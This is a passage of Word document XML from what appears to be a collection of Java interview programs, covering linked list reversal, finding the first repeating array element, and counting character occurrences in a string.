    <w:p w14:paraId="0736642B"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CAD8BFA"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38DFE52A"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ethod to print the linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006752F4"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print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6E61430"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tem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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A13C19"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whi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tem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B8B57F1"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em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dat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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB981D1"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tem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temp</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5DCA2"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9DE050B"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p>
    <w:p w14:paraId="5574812A"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18BFFFF"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22E8CE61"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ethod to add a node at the end of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584212B6"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append</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dat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9D4C826"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> newNod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Nod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ata</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F598E"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hea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EEB9140"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hea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ewNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30170C"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0F62F"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8214635"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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tem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head</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F56FE"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whi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emp</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x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9090BF1"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tem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temp</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xt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BE2D5"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7D9EDC1"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temp</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x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ewNode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E82DFED"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DD566A1"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5ECF1F07"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AE64900"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yLinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lis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nglyLinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B6FB2"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2348F2AE"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Add some elements to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092D028"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ppend</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B486B4B"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ppend</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448F125"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ppend</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30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57C432"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ppend</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40</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0EB55D"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ppend</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50</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E508CB8"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23336A2E"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Original List:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D1997"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ist</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B7626"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52003D6F"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Reverse the linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41BCEA"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verse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF944EE"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77D65C43"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Reversed List:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E75A4"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ist</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1405CB" w14:textId="77777777"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E28ABA4" w14:textId="1F48D1B3" w:rsidR="00371995" w:rsidRPr="00CE4B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28A402CB" w14:textId="77777777" w:rsidR="00786506" w:rsidRPr="00CE4B95" w:rsidRDefault="00786506" w:rsidP="00786506">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A70347" w14:textId="582ACC78" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="_Toc196307814"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00F22C1F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – First repeating number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="334"/>
    </w:p>
    <w:p w14:paraId="0D35B54E" w14:textId="7569DFFE" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="008E1319">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to print the first occurrence of a repeating element from integer Array?</w:t>
      </w:r>
      <w:r w:rsidR="00760106" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: [6,10,7,8,9,7,11,12]</w:t>
      </w:r>
      <w:r w:rsidR="00760106" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60792423" w14:textId="325964F8" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236DE2C5"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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A16CD1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D8722E"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irstRepeatingEleme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AA129E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D13891"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ethod to find and print the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73EE9C"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findFirstRepeating</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695D202"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e a HashSet to store elements we have already seen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6499A"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Se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see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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52627F99"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5E494"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terate over the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDECCFE"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76B1434"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f the element is already in the set, it's the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2BFF9"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ee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ntain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8BB65F5"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First repeating elemen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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843522E"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Exit as we found the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B487F4"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DD05BED"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therwise, add the element to the set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D638D75"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xml:space="preserve">            seen</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um</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F368CBC"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC1C9DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3769D44A"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f no repeating element is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201ECC7"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o repeating element found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE57C96"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4E96EB7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4955B9"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A6A5B9F"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Example input array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D49AC31"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6</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7</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8</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9</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7</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5FADF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0BDBC"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all the method to find and print the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B9E5A"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xml:space="preserve">        findFirstRepeat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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6916C05A" w14:textId="77777777"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11DD1DD" w14:textId="3FC7BDAC" w:rsidR="00B30584" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F8357" w14:textId="77777777" w:rsidR="00EA59B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA59B7" w:rsidP="00EA59B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FF10DD" w14:textId="405CDFA9" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc196307815"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CE00E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Print occurrence of each character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w14:paraId="01965D9E" w14:textId="6238C7DE" w:rsidR="00AE3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00AE3A76">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00AE3A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a program to print occurrence of each character in the given string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36B012" w14:textId="5BF1F91B" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3A76" w:rsidP="00AE3A76">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: String str = "This is an interview is going on with Amdocs";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D8ECF" w14:textId="7AC5CB04" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33745BCE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2AB5B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A47A68"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haracterOccurrenc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1F8B209"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2DD56"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ethod to print the occurrence of each character in the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081EC75"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printCharacterOccurrences</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t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3591189"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e a HashMap to store the frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B025DC2"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Charac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charCount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p>
    <w:p w14:paraId="74D39CA9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E00A5"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onvert the string to an array of characters and iterate over it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DBA086"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch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CharArr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4A9DB6C"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gnore spaces (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03536E32"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ch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2B7165E"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xml:space="preserve">                charCoun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harCoun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OrDefaul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34E1D012"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5F8193B"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9ECCC58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68129F"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int the occurrence of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F68FB"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Entry</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Charac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entr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harCoun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ntryS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18B2B8A"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nt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Ke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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33123C7A"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DA6EB03"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792B1FF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C370A9"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1C5C1E3"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Example input string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABE7AC"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t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This is an interview is going on with Amdocs"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3A9E6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF98C10"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all the method to print character occurrences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7EFB6F"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xml:space="preserve">        printCharacterOccurrence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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65809EF3" w14:textId="77777777"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5B986AC" w14:textId="4239F629" w:rsidR="001E6130" w:rsidRPr="00CE4B95"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3C2EFA61" w14:textId="77777777" w:rsidR="00621D18" w:rsidRPr="00CE4B95" w:rsidRDefault="00621D18" w:rsidP="00621D18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E92F575" w14:textId="17A91979" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
